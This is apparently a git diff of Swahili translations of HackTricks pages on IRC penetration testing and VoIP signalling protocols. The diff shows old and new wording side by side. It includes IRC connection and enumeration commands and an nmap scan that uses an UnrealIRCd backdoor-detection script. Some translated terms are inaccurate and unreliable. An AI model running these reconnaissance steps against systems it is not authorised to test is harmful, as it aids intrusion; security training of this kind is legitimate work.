* [https://stackoverflow.com/questions/41645665/how-containerd-compares-to-runc](https://stackoverflow.com/questions/41645665/how-containerd-compares-to-runc)
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa huduma za **bure** za kuangalia ikiwa kampuni au wateja wake wameathiriwa na **malware za wizi**.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na malware za kuiba taarifa.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na malware za wizi wa habari.
Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** hapa:
Unaweza kutembelea tovuti yao na kujaribu injini yao kwa **bure** hapa:
{% embed url="https://whiteintel.io" %}

View file

@ -1,26 +1,26 @@
# 194,6667,6660-7000 - Kupima IRC
# 194,6667,6660-7000 - Kupima Usalama wa IRC
<details>
<summary><strong>Jifunze AWS hacking kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary><strong>Jifunze kuhusu kuvamia AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kuhack kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* **Shiriki mbinu zako za kuvamia kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji iliyochochewa na **dark-web** inayotoa huduma za **bure** kuchunguza ikiwa kampuni au wateja wake wameathiriwa na **malware za wizi**.
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa huduma za **bure** za kuangalia ikiwa kampuni au wateja wake wameathiriwa na **malware za wizi**.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na malware za kuiba habari.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na malware za kuiba taarifa.
Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** kwa:
@ -30,11 +30,11 @@ Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** kwa:
## Taarifa Msingi
IRC, awali **itifaki ya maandishi ya kawaida**, ilipewa **194/TCP** na IANA lakini kawaida inaendeshwa kwenye **6667/TCP** na bandari sawa ili kuepuka kuhitaji **mamlaka ya msingi** kwa uendeshaji.
IRC, awali ilikuwa **itifaki ya maandishi ya kawaida**, ilipewa **194/TCP** na IANA lakini kawaida inaendeshwa kwenye **6667/TCP** na bandari sawa ili kuepuka kuhitaji **mamlaka ya msingi** kwa uendeshaji.
**Jina la utani** ndilo linalohitajika kuunganisha kwenye seva. Baada ya kuunganisha, seva hufanya utafutaji wa DNS wa kurudi kwa IP ya mtumiaji.
Watumiaji wanagawanywa katika **waendeshaji**, ambao wanahitaji **jina la mtumiaji** na **nywila** kwa ufikiaji zaidi, na **watumiaji wa kawaida**. Waendeshaji wana viwango tofauti vya mamlaka, na waendeshaji wa mfumo wako juu.
Watumiaji wanagawanywa katika **waendeshaji**, ambao wanahitaji **jina la mtumiaji** na **nywila** kwa ufikiaji zaidi, na **watumiaji wa kawaida**. Waendeshaji wana viwango tofauti vya mamlaka, na waaminifu wako juu.
**Bandari za msingi:** 194, 6667, 6660-7000
```
@ -52,7 +52,7 @@ openssl s_client -connect <IP>:<PORT> -quiet
```
### Mwongozo
Hapa unaweza kuona jinsi ya kuunganisha na kupata upatikanaji wa IRC ukitumia **jina la kupotosha** kisha kuchunguza taarifa za kuvutia. Unaweza kujifunza amri zaidi za IRC [hapa](https://en.wikipedia.org/wiki/List\_of\_Internet\_Relay\_Chat\_commands#USERIP).
Hapa unaweza kuona jinsi ya kuunganisha na kupata upatikanaji wa IRC ukitumia **jina la utani lisilo la kawaida** na kisha kuchambua taarifa za kuvutia. Unaweza kujifunza amri zaidi za IRC [hapa](https://en.wikipedia.org/wiki/List\_of\_Internet\_Relay\_Chat\_commands#USERIP).
```bash
#Connection with random nickname
USER ran213eqdw123 0 * ran213eqdw123
@ -98,21 +98,21 @@ nmap -sV --script irc-botnet-channels,irc-info,irc-unrealircd-backdoor -p 194,66
* `kutafuta jina lako la mwenyeji`
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa huduma za **bure** za kuangalia ikiwa kampuni au wateja wake wameathiriwa na **malwares za kuiba**.
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa huduma za **bure** za kuangalia ikiwa kampuni au wateja wake wameathiriwa na **malwares za wizi**.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na programu hasidi za kuiba taarifa.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na malwares za wizi wa habari.
Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** kwa:
Unaweza kutembelea tovuti yao na kujaribu injini yao kwa **bure** kwa:
{% embed url="https://whiteintel.io" %}
<details>
<summary><strong>Jifunze kuhusu kuvamia AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalamu wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
@ -120,6 +120,6 @@ Njia nyingine za kusaidia HackTricks:
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kuvamia kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>

View file

@ -6,21 +6,21 @@
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA USAJILI**](https://github.com/sponsors/carlospolop)!
* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa huduma za **bure** za kuangalia ikiwa kampuni au wateja wake wameathiriwa na **malware za wizi**.
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji iliyochangiwa na **dark-web** inayotoa huduma za **bure** za kuangalia ikiwa kampuni au wateja wake wameathiriwa na **malware za wizi**.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na malware za kuiba habari.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na malware za kuiba taarifa.
Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** kwa:
@ -28,7 +28,7 @@ Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** kwa:
---
## Itifaki za Kutia Saini
## Itifaki za Kutambua
### SIP (Itifaki ya Kuanzisha Kikao)
@ -38,83 +38,95 @@ Hii ni kiwango cha viwanda, kwa maelezo zaidi angalia:
[sip-session-initiation-protocol.md](sip-session-initiation-protocol.md)
{% endcontent-ref %}
### MGCP (Itifaki ya Kudhibiti Geti la Vyombo vya Habari)
### MGCP (Itifaki ya Kudhibiti Kituo cha Vyombo vya Habari)
MGCP (Itifaki ya Kudhibiti Geti la Vyombo vya Habari) ni **itifaki ya kutia saini** na **kudhibiti simu** iliyoelezwa katika RFC 3435. Inafanya kazi katika muundo uliojikita, ambao una sehemu kuu tatu:
MGCP (Itifaki ya Kudhibiti Kituo cha Vyombo vya Habari) ni **itifaki ya kutambua** na **kudhibiti simu** iliyoelezwa katika RFC 3435. Inafanya kazi katika muundo uliojikita, ambao una vipengele vitatu muhimu:
1. **Mnadaaji wa Simu au Msimamizi wa Geti la Vyombo vya Habari (MGC)**: Geti kuu katika muundo wa MGCP ni jukumu la **kusimamia na kudhibiti geti la vyombo vya habari**. Inashughulikia mchakato wa kuanzisha simu, kubadilisha, na kumaliza simu. MGC inawasiliana na geti la vyombo vya habari kwa kutumia itifaki ya MGCP.
2. **Vyombo vya Habari (MGs) au Geti la Mtumwa**: Vifaa hivi **vinabadilisha mitiririko ya vyombo vya habari vya dijiti kati ya mitandao tofauti**, kama vile simu za jadi zilizounganishwa kwa mzunguko na mitandao ya IP iliyosongwa kwa pakiti. Vinasimamiwa na MGC na kutekeleza amri zinazopokelewa kutoka kwake. Vyombo vya habari vinaweza kuwa na kazi kama vile kubadilisha namna ya sauti, kufungasha pakiti, na kufuta sauti.
3. **Geti za Kutia Saini (SGs)**: Geti hizi zinahusika na **kubadilisha ujumbe wa kutia saini kati ya mitandao tofauti**, kuruhusu mawasiliano laini kati ya mifumo ya simu za jadi (k.m., SS7) na mitandao inayotumia IP (k.m., SIP au H.323). Geti za kutia saini ni muhimu kwa uratibu na kuhakikisha kuwa habari ya kudhibiti simu inasambazwa ipasavyo kati ya mitandao tofauti.
1. **Mnadaaji wa Simu au Msimamizi wa Kituo cha Vyombo vya Habari (MGC)**: Mnadaaji mkuu katika muundo wa MGCP anahusika na **usimamizi na udhibiti wa vituo vya vyombo vya habari**. Inashughulikia mchakato wa kuanzisha simu, kubadilisha, na kumaliza simu. MGC inawasiliana na vituo vya vyombo vya habari kwa kutumia itifaki ya MGCP.
2. **Vituo vya Vyombo vya Habari (MGs) au Vituo vya Watumwa**: Vifaa hivi **vinabadilisha mitiririko ya vyombo vya habari vya dijiti kati ya mitandao tofauti**, kama vile simu za jadi zilizounganishwa kwa mzunguko na mitandao ya IP iliyosongwa kwa pakiti. Vinasimamiwa na MGC na kutekeleza amri zinazopokelewa kutoka kwake. Vituo vya vyombo vya habari vinaweza kujumuisha kazi kama vile kubadilisha muundo, paketization, na kufuta sauti.
3. **Vituo vya Kutambua (SGs)**: Vituo hivi vinahusika na **kubadilisha ujumbe wa kutambua kati ya mitandao tofauti**, kuruhusu mawasiliano laini kati ya mifumo ya simu za jadi (k.m., SS7) na mitandao inayotumia IP (k.m., SIP au H.323). Vituo vya kutambua ni muhimu kwa uratibu na kuhakikisha kuwa habari ya udhibiti wa simu inasambazwa ipasavyo kati ya mitandao tofauti.
Kwa muhtasari, MGCP inajikita katika mantiki ya kudhibiti simu katika mnadaaji wa simu, ambayo inasaidia usimamizi rahisi wa vyombo vya habari na geti za kutia saini, ikitoa uwezo bora wa kupanuka, uaminifu, na ufanisi katika mitandao ya mawasiliano.
Kwa muhtasari, MGCP inajikita katika mantiki ya udhibiti wa simu katika mnadaaji wa simu, ambayo inasaidia usimamizi rahisi wa vituo vya vyombo vya habari na kutambua, kutoa uwezo bora wa kupanuka, uaminifu, na ufanisi katika mitandao ya mawasiliano.
### SCCP (Itifaki ya Kudhibiti Mteja Mdogo)
### SCCP (Itifaki ya Udhibiti wa Mteja Mdogo)
Itifaki ya Kudhibiti Mteja Mdogo (SCCP) ni **itifaki ya kutia saini na kudhibiti simu** inayomilikiwa na Cisco Systems. Inatumiwa hasa kwa mawasiliano kati ya **Meneja wa Mawasiliano wa Cisco** (inayojulikana hapo awali kama CallManager) na simu za IP za Cisco au vifaa vingine vya sauti na video vya Cisco.
Itifaki ya Udhibiti wa Mteja Mdogo (SCCP) ni **itifaki ya kutambua na udhibiti wa simu** inayomilikiwa na Cisco Systems. Inatumika hasa kwa mawasiliano kati ya **Meneja wa Mawasiliano wa Cisco Unified** (inayojulikana hapo awali kama CallManager) na simu za IP za Cisco au vifaa vingine vya sauti na video vya Cisco.
SCCP ni itifaki nyepesi inayosimplisha mawasiliano kati ya seva ya kudhibiti simu na vifaa vya mwisho. Inaitwa "Skinny" kwa sababu ya muundo wake wa kimsingi na mahitaji madogo ya upana wa bandari ikilinganishwa na itifaki zingine za VoIP kama H.323 au SIP.
SCCP ni itifaki nyepesi inayosimplisha mawasiliano kati ya seva ya udhibiti wa simu na vifaa vya mwisho. Inaitwa "Skinny" kwa sababu ya muundo wake wa minimalist na mahitaji madogo ya upana wa bandari ikilinganishwa na itifaki zingine za VoIP kama H.323 au SIP.
Sehemu kuu za mfumo wa SCCP ni:
Vipengele muhimu vya mfumo uliojikita kwenye SCCP ni:
1. **Seva ya Kudhibiti Simu**: Seva hii, kawaida Meneja wa Mawasiliano wa Cisco, inasimamia mchakato wa kuanzisha simu, kubadilisha, na kumaliza simu, pamoja na huduma zingine za simu kama vile kupeleka simu, kuhamisha simu, na kushikilia simu.
2. **Vifaa vya Mwisho vya SCCP**: Hivi ni vifaa kama simu za IP, vitengo vya mkutano wa video, au vifaa vingine vya sauti na video vya Cisco vinavyotumia SCCP kwa mawasiliano na seva ya kudhibiti simu. Vinajiandikisha kwa seva, kutuma na kupokea ujumbe wa kutia saini, na kufuata maagizo yanayotolewa na seva ya kudhibiti simu kwa usimamizi wa simu.
3. **Geti**: Vifaa hivi, kama vile geti za sauti au vyombo vya habari, wanahusika na kubadilisha mitiririko ya vyombo vya habari kati ya mitandao tofauti, kama vile simu za jadi zilizounganishwa kwa mzunguko na mitandao ya IP iliyosongwa kwa pakiti. Vinaweza pia kuwa na kazi zaidi, kama vile kubadilisha namna ya sauti au kufuta sauti.
1. **Seva ya Udhibiti wa Simu**: Seva hii, kawaida Cisco Unified Communications Manager, inasimamia mchakato wa kuanzisha simu, kubadilisha, na kumaliza simu, pamoja na huduma zingine za simu kama vile kupeleka simu, kuhamisha simu, na kushikilia simu.
2. **Vifaa vya SCCP**: Hivi ni vifaa kama simu za IP, vitengo vya mkutano wa video, au vifaa vingine vya sauti na video vya Cisco vinavyotumia SCCP kwa mawasiliano na seva ya udhibiti wa simu. Vinajisajili kwa seva, kutuma na kupokea ujumbe wa kutambua, na kufuata maagizo yanayotolewa na seva ya udhibiti wa simu kwa usimamizi wa simu.
3. **Malango**: Vifaa hivi, kama malango ya sauti au malango ya vyombo vya habari, wanahusika na kubadilisha mitiririko ya vyombo vya habari kati ya mitandao tofauti, kama simu za jadi zilizounganishwa kwa mzunguko na mitandao ya IP iliyosongwa kwa pakiti. Vinaweza pia kujumuisha kazi zaidi, kama vile kubadilisha muundo au kufuta sauti.
SCCP inatoa njia rahisi na ufanisi wa mawasiliano kati ya seva za kudhibiti simu za Cisco na vifaa vya mwisho. Walakini, ni muhimu kutambua kwamba **SCCP ni itifaki ya kipekee**, ambayo inaweza kuzuia uratibu na mifumo au vifaa visivyo vya Cisco. Katika kesi kama hizo, itifaki zingine za VoIP za viwango kama SIP zinaweza kuwa chaguo bora zaidi.
SCCP inatoa njia rahisi na ufanisi wa mawasiliano kati ya seva za udhibiti wa simu za Cisco na vifaa vya mwisho. Walakini, ni muhimu kutambua kwamba **SCCP ni itifaki ya kipekee**, ambayo inaweza kuzuia uratibu na mifumo au vifaa visivyo vya Cisco. Katika kesi kama hizo, itifaki zingine za VoIP za viwango kama SIP zinaweza kuwa chaguo bora zaidi.
### H.323
H.323 ni **mkusanyo wa itifaki** za mawasiliano ya multimedia, ikiwa ni pamoja na sauti, video, na mikutano ya data juu ya mitandao iliyosongwa kwa pakiti, kama vile mitandao inayotumia IP. Iliundwa na **Shirika la Kimataifa la Mawasiliano** (ITU-T) na hutoa mfumo kamili wa kusimamia vikao vya mawasiliano ya multimedia.
H.323 ni **mkusanyo wa itifaki** za mawasiliano ya multimedia, ikiwa ni pamoja na sauti, video, na mikutano ya data juu ya mitandao iliyosongwa kwa pakiti, kama vile mitandao inayotumia IP. Iliundwa na **Shirika la Mawasiliano la Kimataifa** (ITU-T) na hutoa mfumo kamili wa kusimamia vikao vya mawasiliano ya multimedia.
Baadhi ya sehemu muhimu za mkusanyo wa H.323 ni pamoja na:
Baadhi ya vipengele muhimu vya mkusanyo wa H.323 ni pamoja na:
1. **Vifaa vya Mwisho**: Hivi ni vifaa vya mwisho, kama vile simu za IP, mifumo ya mkutano wa video, au programu za programu, ambazo zinasaidia H.323 na zinaweza kushiriki katika vikao vya mawasiliano ya multimedia.
2. **Geti**: Vifaa hivi vinabadilisha mitiririko ya vyombo vya habari kati ya mitandao tofauti, kama vile simu za jadi zilizounganishwa kwa mzunguko na mitandao ya IP iliyosongwa kwa pakiti, kuruhusu uratibu kati ya H.323 na mifumo mingine ya mawasiliano. Vinaweza pia kuwa na kazi zaidi, kama vile kubadilisha namna ya sauti au kufuta sauti.
3. **Walinzi wa Geti**: Hizi ni sehemu za hiari zinazotoa huduma za kudhibiti simu na usimamizi katika mtandao wa H.323. Hufanya kazi kama vile tafsiri ya anwani, usimamizi wa upana wa bandari, na kudhibiti idhini, kusaidia katika usimamizi na optimization ya rasilimali za mtandao.
4. **Vifaa vya Udhibiti wa Multipoint (MCUs)**: Vifaa hivi huwezesha mikutano ya multipoint kwa kusimamia na kuchanganya mitiririko ya vyombo vya habari kutoka kwa vifaa vingi vya mwisho. MCUs huwezesha huduma kama vile kudhibiti mpangilio wa video, kubadilisha sauti kulingana na sauti, na uwepo endelevu, kuruhusu kuandaa mikutano kubwa na washiriki wengi.
1. **Vifaa vya Mwisho**: Hivi ni vifaa vya mwisho, kama simu za IP, mifumo ya mkutano wa video, au programu za programu, ambazo zinasaidia H.323 na zinaweza kushiriki katika vikao vya mawasiliano ya multimedia.
2. **Malango**: Vifaa hivi vinabadilisha mitiririko ya vyombo vya habari kati ya mitandao tofauti, kama simu za jadi zilizounganishwa kwa mzunguko na mitandao ya IP iliyosongwa kwa pakiti, kuruhusu uratibu kati ya H.323 na mifumo mingine ya mawasiliano. Vinaweza pia kujumuisha kazi zaidi, kama vile kubadilisha muundo au kufuta sauti.
3. **Walinzi wa Malango**: Hizi ni vipengele vya hiari vinavyotoa huduma za udhibiti wa simu na usimamizi katika mtandao wa H.323. Hufanya kazi kama kutafsiri anwani, usimamizi wa upana wa bandari, na udhibiti wa idhini, kusaidia katika usimamizi na optimization ya rasilimali za mtandao.
4. **Vifaa vya Udhibiti wa Multipoint (MCUs)**: Vifaa hivi huwezesha mikutano ya multipoint kwa kusimamia na kuchanganya mitiririko ya vyombo vya habari kutoka kwa vifaa vingi vya mwisho. MCUs huwezesha huduma kama udhibiti wa mpangilio wa video, kubadilisha kwa sauti inayoendeshwa na sauti, na uwepo endelevu, kuruhusu kuandaa mikutano kubwa na washiriki wengi.
H.323 inasaidia anuwai ya kodeki za sauti na video, pamoja na huduma zingine za ziada kama vile kupeleka simu, kuhamisha simu, kushikilia simu, na kusubiri simu. Licha ya kupokelewa kwa kiasi kikubwa katika siku za mwanzo za VoIP, H.323 imeanza kubadilishwa polepole na itifaki za kisasa na zenye ufanisi zaidi kama **Itifaki ya Kuanzisha Kikao (SIP)**, ambayo inatoa uratibu bora na utekelezaji rahisi. Walakini, H.323 bado inatumika katika mifumo mingi ya zamani na inaendelea kusaidiwa na wauzaji mbalimbali wa vifaa.
H.323 inasaidia anuwai ya kodeki za sauti na video, pamoja na huduma zingine za ziada kama kupeleka simu, kuhamisha simu, kushikilia simu, na kusubiri simu. Licha ya kupokelewa kwa kiasi kikubwa katika siku za mwanzo za VoIP, H.323 imeanza kubadilishwa polepole na itifaki za kisasa na zenye ufanisi zaidi kama **Itifaki ya Kuanzisha Kikao (SIP)**, ambayo inatoa uratibu bora na utekelezaji rahisi. Walakini, H.323 bado inatumika katika mifumo mingi ya zamani na inaendelea kusaidiwa na wauzaji mbalimbali wa vifaa.
### IAX (Inter Asterisk eXchange)
IAX (Inter-Asterisk eXchange) ni **itifaki ya kutia saini na kudhibiti simu** inayotumiwa hasa kwa mawasiliano kati ya seva za Asterisk PBX (Private Branch Exchange) na vifaa vingine vya VoIP. Iliundwa na Mark Spencer, mwanzilishi wa programu ya Asterisk PBX ya chanzo wazi, kama mbadala kwa itifaki zingine za VoIP kama SIP na H.323.
IAX (Inter-Asterisk eXchange) ni **itifaki ya kutambua na udhibiti wa simu** inayotumiwa hasa kwa mawasiliano kati ya seva za Asterisk PBX (Private Branch Exchange) na vifaa vingine vya VoIP. Iliundwa na Mark Spencer, mwanzilishi wa programu ya Asterisk PBX ya chanzo wazi, kama mbadala kwa itifaki zingine za VoIP kama SIP na H.323.
IAX inajulikana kwa **urahisi, ufanisi, na urahisi wa utekelezaji**. Baadhi ya sifa muhimu za IAX ni pamoja na:
IAX inajulikana kwa **urahisi, ufanisi, na urahisi wa utekelezaji**. Baadhi ya vipengele muhimu vya IAX ni pamoja na:
1. **Bandari Moja ya UDP**: IAX hutumia bandari moja ya UDP (4569) kwa mawasiliano ya kutia saini na vyombo vya habari, ambayo inasimplisha kupitisha kizuizi cha firewall na NAT, ikifanya iwe rahisi kupeleka katika mazingira mbalimbali ya mtandao.
2. **Itifaki ya Binary**: Tofauti na itifaki zinazotumia maandishi kama SIP, IAX ni itifaki ya binary, ambayo inapunguza matumizi yake ya upana wa bandari na kufanya iwe ufanisi zaidi katika kutuma data ya kutia saini na vyombo vya habari.
3. **Trunking**: IAX inasaidia trunking, ambayo inaruhusu simu nyingi kuunganishwa katika muunganisho mmoja wa mtandao, kupunguza gharama za ziada na kuboresha matumizi ya upana wa bandari.
4. **Ufichaji wa Asili**: IAX ina msaada wa kujengwa kwa ufichaji, ikitumia mbinu kama RSA kwa kubadilishana funguo na AES kwa ufichaji wa vyombo vya habari, kutoa mawasiliano salama kati ya vituo.
5. **Mawasiliano ya Mwenzake kwa Mwenzake**: IAX inaweza kutumika kwa mawasiliano moja kwa moja kati ya vituo bila haja ya seva kuu, ikiruhusu mchakato rahisi na ufanisi zaidi wa kupangilia simu.
1. **Bandari Moja ya UDP**: IAX hutumia bandari moja ya UDP (4569) kwa mawasiliano ya kutambua na vyombo vya habari, ambayo inasimplisha upitishaji wa firewall na NAT, ikifanya iwe rahisi kupeleka katika mazingira mbalimbali ya mtandao.
2. **Itifaki ya Binary**: Tofauti na itifaki zinazotegemea maandishi kama SIP, IAX ni itifaki ya binary, ambayo inapunguza matumizi yake ya upana wa bandari na kufanya iwe bora zaidi kwa uhamishaji wa data za kutambua na vyombo vya habari.
3. **Trunking**: IAX inasaidia trunking, ambayo inaruhusu simu nyingi kuunganishwa katika muunganisho mmoja wa mtandao, kupunguza gharama ya ziada na kuboresha matumizi ya upana wa bandari.
4. **Udhibiti wa Asili**: IAX ina msaada wa asili kwa usimbaji, ikitumia mbinu kama RSA kwa kubadilishana funguo na AES kwa usimbaji wa vyombo vya habari, kutoa mawasiliano salama kati ya vituo vya mwisho.
5. **Mawasiliano ya Mmoja kwa Mmoja**: IAX inaweza kutumika kwa mawasiliano moja kwa moja kati ya vituo vya mwisho bila haja ya seva kuu, kuruhusu njia rahisi na ufanisi zaidi wa kupangilia simu.
Licha ya faida zake, IAX ina baadhi ya mapungufu, kama vile kuzingatia kuu kwa mazingira ya Asterisk na kupokea kwa kiasi kidogo ikilinganishwa na itifaki zilizothibitishwa zaidi kama SIP. Kama matokeo, IAX huenda sio chaguo bora kwa uratibu na mifumo au vifaa visivyo vya Asterisk. Walakini, kwa wale wanaofanya kazi ndani ya mazingira ya Asterisk, IAX inatoa suluhisho imara na ufanisi kwa mawasiliano ya VoIP.
## Itifaki za Usafirishaji na Usafirishaji
Licha ya faida zake, IAX ina baadhi ya mapungufu, kama vile kuzingatia kuu kwa mazingira ya Asterisk na kupokea kwa kiwango kidogo ikilinganishwa na itifaki zilizothibitishwa zaidi kama SIP. Kama matokeo, IAX huenda sio chaguo bora kwa uratibu na mifumo au vifaa visivyo vya Asterisk. Walakini, kwa wale wanaofanya kazi ndani ya mazingira ya Asterisk, IAX inatoa suluhisho imara na ufanisi kwa mawasiliano ya VoIP.
## Itifaki za Uhamishaji na Usafirishaji
### SDP (Itifaki ya Maelezo ya Kikao)
SDP (Itifaki ya Maelezo ya Kikao) ni **muundo wa maandishi** unaotumika kuelezea sifa za vikao vya multimedia, kama sauti, video, au mikutano ya data, juu ya mitandao ya IP. Iliundwa na **Internet Engineering Task Force (IETF)** na inafafanuliwa katika **RFC 4566**. SDP haitumii usafirishaji halisi wa media au kuanzisha kikao lakini hutumiwa pamoja na itifaki zingine za ishara, kama **SIP (Itifaki ya Kuanzisha Kikao)**, kujadiliana na kubadilishana habari kuhusu mito ya media na sifa zao.
SDP (Session Description Protocol) ni **muundo wa maandishi** unaotumika kuelezea sifa za vikao vya multimedia, kama sauti, video, au mikutano ya data, juu ya mitandao ya IP. Iliundwa na **Internet Engineering Task Force (IETF)** na inafafanuliwa katika **RFC 4566**. SDP haitengi uhamishaji halisi wa media au kuanzisha kikao lakini hutumiwa pamoja na itifaki zingine za ishara, kama **SIP (Session Initiation Protocol)**, kwa ajili ya kujadiliana na kubadilishana habari kuhusu mito ya media na sifa zao.
Baadhi ya vipengele muhimu vya SDP ni pamoja na:
1. **Maelezo ya Kikao**: SDP inaelezea maelezo ya kikao cha multimedia, ikiwa ni pamoja na jina la kikao, maelezo ya kikao, wakati wa kuanza, na wakati wa mwisho.
2. **Mito ya Media**: SDP inafafanua sifa za mito ya media, kama aina ya media (sauti, video, au maandishi), itifaki ya usafirishaji (k.m., RTP au SRTP), na muundo wa media (k.m., habari za codec).
3. **Maelezo ya Uunganisho**: SDP hutoa habari kuhusu anwani ya mtandao (anwani ya IP) na nambari ya bandari ambapo media inapaswa kutumwa au kupokelewa.
4. **Vipengele**: SDP inasaidia matumizi ya vipengele kutoa habari ya ziada, hiari kuhusu kikao au mto wa media. Vipengele vinaweza kutumika kwa kufafanua vipengele mbalimbali kama vile funguo za kuchakata, mahitaji ya upana wa bandari, au mbinu za kudhibiti media.
